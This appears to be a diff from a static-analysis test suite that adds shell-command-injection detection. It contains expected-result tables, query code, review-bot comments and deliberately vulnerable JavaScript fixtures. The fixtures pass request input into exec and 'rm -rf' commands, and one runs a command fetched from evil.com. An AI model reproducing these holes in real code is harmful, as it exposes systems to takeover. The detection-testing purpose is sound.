| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:18 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:13:18:23 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:18:22:18:23 | [] |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:14 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:25:20:37 | '<li>' + file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:34:20:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:43:25:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:18 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:13:29:23 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:29:22:29:23 | [] |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:14 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:9:30:22 | files1.forEach |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:24:30:23 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:30:34:30:37 | file |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:18 | files2 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:31:13:31:23 | files2.push |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:13:35:35 | files3 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:22:35:35 | format(files2) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:35:29:35:34 | files2 |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:14:30:14:30 | v |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v |
@@ -223,6 +354,28 @@
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst4.js:8:10:8:60 | 'SELECT ... rams.id |
| SqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst.js:10:10:10:58 | 'SELECT ... rams.id |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:35:18:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name |
| SqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name |
@@ -293,6 +446,26 @@
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name |
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| TaintedPathAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') |
| TaintedPathAtmConfig | autogenerated/TaintedPath/TaintedPath.js:128:11:128:50 | path.re ... /g, '') |


@@ -19,6 +19,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
query predicate isSinkCandidateForQuery(
AtmConfig::AtmConfig queryConfig, JS::DataFlow::PathNode sink
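Review bot: The added `private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm` is appended after `XssThroughDomATM`, which breaks the alphabetical order the neighbouring ATM imports keep (SqlInjection, TaintedPath, Xss, XssThroughDom); placing it directly above the `SqlInjectionATM` line keeps the block sorted. The same applies to the ATM import added in the test query file further down, where `ShellCommandInjectionFromEnvironmentATM` is likewise appended after `XssThroughDomATM`. This is style only; the `...Atm` alias matches the convention of the other imports.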


@@ -30,3 +30,4 @@ xssThroughDomFilteredTruePositives
| autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | not a direct argument to a likely external library call or a heuristic sink (xss) |
| autogenerated/Xss/DomBasedXss/typeahead.js:10:16:10:18 | loc | not a direct argument to a likely external library call or a heuristic sink (xss) |
| autogenerated/Xss/DomBasedXss/typeahead.js:25:18:25:20 | val | not a direct argument to a likely external library call or a heuristic sink (xss) |
shellCommandInjectionFromEnvironmentAtmFilteredTruePositives


@@ -16,11 +16,13 @@ import semmle.javascript.security.dataflow.NosqlInjectionCustomizations
import semmle.javascript.security.dataflow.SqlInjectionCustomizations
import semmle.javascript.security.dataflow.TaintedPathCustomizations
import semmle.javascript.security.dataflow.DomBasedXssCustomizations
import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations
import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAtm
import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
query predicate nosqlFilteredTruePositives(DataFlow::Node endpoint, string reason) {
endpoint instanceof NosqlInjection::Sink and
@@ -51,3 +53,13 @@ query predicate xssThroughDomFilteredTruePositives(DataFlow::Node endpoint, stri
reason = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint) and
reason != "argument to modeled function"
}
query predicate shellCommandInjectionFromEnvironmentAtmFilteredTruePositives(
DataFlow::Node endpoint, string reason
) {
endpoint instanceof ShellCommandInjectionFromEnvironment::Sink and
reason =
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(endpoint) and
reason != "argument to modeled function"
}
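Review bot: The new `shellCommandInjectionFromEnvironmentAtmFilteredTruePositives` predicate has no QLDoc, and its name alone does not say that a "filtered true positive" is a sink of the standard ShellCommandInjectionFromEnvironment query that the ATM config excludes for a reason other than being an argument to a modeled function. A one-line QLDoc above it would make that explicit: `/** Holds if `endpoint` is a `ShellCommandInjectionFromEnvironment::Sink` that the ATM config excludes for `reason`, where that reason is not "argument to modeled function". */`. The body otherwise mirrors the sibling `xssThroughDomFilteredTruePositives` exactly, and the corresponding `.expected` file records no rows for it, so as of this commit the check documents that the ATM config drops none of the standard sinks for any other reason.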


@@ -0,0 +1,95 @@
var cp = require("child_process"),
http = require('http'),
url = require('url');
var server = http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
cp.exec("foo"); // OK
cp.execSync("foo"); // OK
cp.execFile("foo"); // OK
cp.execFileSync("foo"); // OK
cp.spawn("foo"); // OK
cp.spawnSync("foo"); // OK
cp.fork("foo"); // OK
cp.exec(cmd); // NOT OK
cp.execSync(cmd); // NOT OK
cp.execFile(cmd); // NOT OK
cp.execFileSync(cmd); // NOT OK
cp.spawn(cmd); // NOT OK
cp.spawnSync(cmd); // NOT OK
cp.fork(cmd); // NOT OK
cp.exec("foo" + cmd + "bar"); // NOT OK
// These are technically NOT OK, but they are more likely as false positives
cp.exec("foo", {shell: cmd}); // OK
cp.exec("foo", {env: {PATH: cmd}}); // OK
cp.exec("foo", {cwd: cmd}); // OK
cp.exec("foo", {uid: cmd}); // OK
cp.exec("foo", {gid: cmd}); // OK
let sh, flag;
if (process.platform == 'win32')
sh = 'cmd.exe', flag = '/c';
else
sh = '/bin/sh', flag = '-c';
cp.spawn(sh, [ flag, cmd ]); // NOT OK
let args = [];
args[0] = "-c";
args[1] = cmd; // NOT OK
cp.execFile("/bin/bash", args);
let args = [];
args[0] = "-c";
args[1] = cmd; // NOT OK
run("sh", args);
let args = [];
args[0] = `-` + "c";
args[1] = cmd; // NOT OK
cp.execFile(`/bin` + "/bash", args);
cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK
cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK
let myArgs = [];
myArgs.push(`-` + "c");
myArgs.push(cmd);
cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY]
});
function run(cmd, args) {
cp.spawn(cmd, args); // OK - the alert happens where `args` is build.
}
var util = require("util")
http.createServer(function(req, res) {
let cmd = url.parse(req.url, true).query.path;
util.promisify(cp.exec)(cmd); // NOT OK
});
const webpackDevServer = require('webpack-dev-server');
new webpackDevServer(compiler, {
before: function (app) {
app.use(function (req, res, next) {
cp.exec(req.query.fileName); // NOT OK
require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo
});
}
});
import Router from "koa-router";
const router = new Router();
router.get("/ping/:host", async (ctx) => {
cp.exec("ping " + ctx.params.host); // NOT OK
});


@@ -0,0 +1,21 @@
const cp = require('child_process'),
http = require('http'),
url = require('url');
function getShell() {
if (process.platform === 'win32') {
return { cmd: 'cmd', arg: '/C' }
} else {
return { cmd: 'sh', arg: '-c' }
}
}
function execSh(command, options) {
var shell = getShell()
return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD
}
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
execSh(cmd);
});


@@ -0,0 +1,16 @@
const cp = require('child_process'),
http = require('http'),
url = require('url');
function getShell() {
return "sh";
}
function execSh(command, options) {
return cp.spawn(getShell(), ["-c", command], options) // BAD
};
http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
execSh(cmd);
});


@@ -0,0 +1,20 @@
var exec = require('child_process').exec;
function asyncEach(arr, iterator) {
var i = 0;
(function iterate() {
iterator(arr[i++], function () {
if (i < arr.length)
process.nextTick(iterate);
});
})();
}
function execEach(commands) {
asyncEach(commands, (command) => exec(command)); // NOT OK
};
require('http').createServer(function(req, res) {
let cmd = require('url').parse(req.url, true).query.path;
execEach([cmd]);
});


@@ -0,0 +1,63 @@
var express = require('express');
var multer = require('multer');
var upload = multer({ dest: 'uploads/' });
var app = express();
var exec = require("child_process").exec;
app.post('/profile', upload.single('avatar'), function (req, res, next) {
exec("touch " + req.file.originalname); // NOT OK
});
app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) {
req.files.forEach(file => {
exec("touch " + file.originalname); // NOT OK
})
});
var http = require('http');
var Busboy = require('busboy');
http.createServer(function (req, res) {
var busboy = new Busboy({ headers: req.headers });
busboy.on('file', function (fieldname, file, filename, encoding, mimetype) {
exec("touch " + filename); // NOT OK
});
req.pipe(busboy);
}).listen(8000);
const formidable = require('formidable');
app.post('/api/upload', (req, res, next) => {
let form = formidable({ multiples: true });
form.parse(req, (err, fields, files) => {
exec("touch " + fields.name); // NOT OK
});
let form2 = new formidable.IncomingForm();
form2.parse(req, (err, fields, files) => {
exec("touch " + fields.name); // NOT OK
});
});
var multiparty = require('multiparty');
var http = require('http');
http.createServer(function (req, res) {
// parse a file upload
var form = new multiparty.Form();
form.parse(req, function (err, fields, files) {
exec("touch " + fields.name); // NOT OK
});
var form2 = new multiparty.Form();
form2.on('part', function (part) { // / file / field
exec("touch " + part.filename); // NOT OK
});
form2.parse(req);
}).listen(8080);


@@ -0,0 +1,35 @@
var http = require("http"),
url = require("url");
var server = http.createServer(function (req, res) {
let cmd = url.parse(req.url, true).query.path;
require("cross-spawn").sync(cmd); // NOT OK
require("execa").shell(cmd); // NOT OK
require("execa").shellSync(cmd); // NOT OK
require("execa").stdout(cmd); // NOT OK
require("execa").stderr(cmd); // NOT OK
require("execa").sync(cmd); // NOT OK
require("cross-spawn")(cmd); // NOT OK
require("cross-spawn-async")(cmd); // NOT OK
require("exec")(cmd); // NOT OK
require("exec-async")(cmd); // NOT OK
require("execa")(cmd); // NOT OK
require("remote-exec")(target, cmd); // NOT OK
const ssh2 = require("ssh2");
new ssh2().exec(cmd); // NOT OK
new ssh2.Client().exec(cmd); // NOT OK
const SSH2Stream = require("ssh2-streams").SSH2Stream;
new SSH2Stream().exec(false, cmd); // NOT OK
require("execa").node(cmd); // NOT OK
require("foreground-child")(cmd); // NOT OK
const opener = require("opener");
opener("http://github.com/" + url.parse(req.url, true).query.user); // OK
opener("http://github.com", { command: cmd }); // NOT OK
});


@@ -0,0 +1,8 @@
let https = require("https"),
cp = require("child_process");
https.get("https://evil.com/getCommand", res =>
res.on("data", command => {
cp.execSync(command);
})
);


@@ -0,0 +1,147 @@
var cp = require("child_process");
(function() {
cp.exec(process.argv); // NOT OK (just weird)
cp.exec(process.argv[0]); // OK
cp.exec("cmd.sh " + process.argv[0]); // OK
cp.exec("cmd.sh " + process.argv[1]); // OK
cp.exec("cmd.sh " + process.argv[2]); // NOT OK
var args = process.argv.slice(2);
cp.execSync(args[0]); // NOT OK
cp.execSync("cmd.sh " + args[0]); // NOT OK
var fewerArgs = args.slice(1);
cp.execSync(fewerArgs[0]); // NOT OK
cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK
var arg0 = fewerArgs[0];
cp.execSync(arg0); // NOT OK
cp.execSync("cmd.sh " + arg0); // NOT OK
});
(function() {
const args = process.argv.slice(2);
const script = path.join(packageDir, 'app', 'index.js');
cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK
cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK
});
cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK
cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided.
cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK
cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK
(function () {
var args = require('yargs') // eslint-disable-line
.command('serve [port]', 'start the server', (yargs) => { })
.option('verbose', { foo: "bar" })
.argv
cp.exec("cmd.sh " + args); // NOT OK
cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK
});
(function () {
const {
argv: {
...args
},
} = require('yargs')
.usage('Usage: foo bar')
.command();
cp.exec("cmd.sh " + args); // NOT OK
var tainted1 = require('yargs').argv;
var tainted2 = require('yargs').parse()
const {taint1: {...taint1rest},taint2: {...taint2rest}} = {
taint1: tainted1,
taint2: tainted2
}
cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1
cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2
var {...taint3} = require('yargs').argv;
cp.exec("cmd.sh " + taint3); // NOT OK
var [...taint4] = require('yargs').argv;
cp.exec("cmd.sh " + taint4); // NOT OK
});
(function () {
const argv = process.argv.slice(2);
var minimist = require("minimist");
cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK
var subarg = require('subarg');
cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK
var yargsParser = require('yargs-parser');
cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK
import args from 'args'
var flags = args.parse(process.argv);
cp.exec("cmd.sh " + flags.foo); // NOT OK
var flags = require('arg')({...spec});
cp.exec("cmd.sh " + flags.foo); // NOT OK
})
(function () {
const { ArgumentParser } = require('argparse');
const parser = new ArgumentParser({description: 'Argparse example'});
parser.add_argument('-f', '--foo', { help: 'foo bar' });
cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK
});
(function () {
const commandLineArgs = require('command-line-args');
const options = commandLineArgs(optionDefinitions);
cp.exec("cmd.sh " + options.foo); // NOT OK
});
(function () {
const meow = require('meow');
const cli = meow(`helpstring`, {flags: {...flags}});
cp.exec("cmd.sh " + cli.input[0]); // NOT OK
});
(function () {
var dashdash = require('dashdash');
var opts = dashdash.parse({options: options});
cp.exec("cmd.sh " + opts.foo); // NOT OK
var parser = dashdash.createParser({options: options});
var opts = parser.parse();
cp.exec("cmd.sh " + opts.foo); // NOT OK
});
(function () {
const { program } = require('commander');
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK
cp.exec("cmd.sh " + program.pizzaType); // NOT OK
});
(function () {
const { Command } = require('commander');
const program = new Command();
program.version('0.0.1');
cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK
cp.exec("cmd.sh " + program.pizzaType); // NOT OK
});


@@ -0,0 +1,53 @@
const express = require("express");
const app = express();
const { execFile } = require("child_process");
app.get("/", (req, res) => {
const remote = req.query.remote;
execFile("git", ["ls-remote", remote]); // NOT OK
execFile("git", ["fetch", remote]); // NOT OK
indirect("git", ["ls-remote", remote]); // NOT OK
const myArgs = req.query.args;
execFile("git", myArgs); // NOT OK
if (remote.startsWith("--")) {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here.
} else {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option
}
if (remote.startsWith("git@")) {
execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL
} else {
execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string
}
execFile("git", req.query.args); // NOT OK - unknown args
execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code
execFile("git", ["add", req.query.remote].concat([otherargs()])); // OK - git add is not a command that can be used to execute arbitrary code
execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat.
execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK
// hg
execFile("hg", ["clone", req.query.remote]); // NOT OK
execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned`
execFile("hg", req.query.args); // NOT OK - unknown args
execFile("hg", ["clone", "--", req.query.remote]); // OK
});
function indirect(cmd, args) {
execFile(cmd, args); // - OK - ish, the vulnerability not reported here
}
app.listen(3000, () => console.log("Example app listening on port 3000!"));


@@ -0,0 +1,13 @@
var cp = require('child_process'),
path = require('path'),
execa = require("execa");
(function() {
cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD
cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD
execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK
execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK
const safe = "\"" + path.join(__dirname, "temp") + "\"";
execa.shellSync('rm -rf ' + safe); // OK
});


@@ -0,0 +1,7 @@
// is imported from lib.js
const cp = require("child_process");
module.exports.thisMethodIsImported = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}


@@ -0,0 +1,547 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // NOT OK
cp.execFile(name, [name]); // OK
cp.execFile(name, name); // OK
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports.foo.bar = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
function cla() { }
cla.prototype.method = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports = new cla();
function cla2() { }
cla2.prototype.method = function (name) {
cp.exec("rm -rf " + name); // NOT OK
}
module.exports.bla = new cla2();
module.exports.lib2 = require("./lib2.js")
class Cla3 {
constructor(name) {
cp.exec("rm -rf " + name); // NOT OK
}
static foo(name) {
cp.exec("rm -rf " + name); // NOT OK
}
bar(name) {
cp.exec("rm -rf " + name); // NOT OK
cp.exec("rm -rf " + notASource); // OK
}
}
module.exports.cla3 = Cla3;
module.exports.mz = function (name) {
require("mz/child_process").exec("rm -rf " + name); // NOT OK.
}
module.exports.flow = function (name) {
var cmd1 = "rm -rf " + name; // NOT OK.
cp.exec(cmd1);
var cmd2 = "rm -rf " + name; // NOT OK.
function myExec(cmd) {
cp.exec(cmd);
}
myExec(cmd2);
}
module.exports.stringConcat = function (name) {
cp.exec("rm -rf " + name); // NOT OK.
cp.exec(name); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // OK.
cp.exec("cat /foO/BAR/" + name) // NOT OK.
cp.exec("cat \"" + name + "\"") // NOT OK.
cp.exec("cat '" + name + "'") // NOT OK.
cp.exec("cat '/foo/bar" + name + "'") // NOT OK.
cp.exec(name + " some file") // OK.
}
module.exports.arrays = function (name) {
cp.exec("rm -rf " + name); // NOT OK.
var args1 = ["node"];
args1.push(name); // NOT OK.
cp.exec(args1.join(" "));
cp.exec(["rm -rf", name].join(" ")); // NOT OK.
cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK.
cp.execFile("rm", ["-rf", name]); // OK
}
var util = require("util");
module.exports.format = function (name) {
cp.exec(util.format("rm -rf %s", name)); // NOT OK
cp.exec(util.format("rm -rf '%s'", name)); // NOT OK
cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK
cp.exec(util.format("%s foo/bar", name)); // OK
